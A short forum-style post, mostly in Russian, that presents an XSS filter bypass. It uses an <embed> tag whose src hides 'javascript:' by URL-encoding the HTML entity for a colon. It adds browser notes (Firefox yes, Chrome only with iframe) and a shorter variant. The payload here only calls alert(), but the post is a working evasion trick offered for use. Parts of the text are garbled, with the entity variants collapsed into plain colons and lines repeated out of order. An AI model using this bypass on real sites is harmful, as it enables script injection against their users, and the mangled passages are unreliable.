Небольшой XSS filter bypass
The url encoded portion is the html entity for colon:
Более короткая версия:
Также можно менять в сорце:
Работает на Mozilla FF, не работает на Chrome. Для работы на Chrome измените embed на iframe.
Код:
<embed src="javascript%26%63%6f%6c%6f%6e%3balert()">
:Более короткая версия:
: или : вместо : Также можно менять в сорце:
Код:
<embed src="javascript:alert()">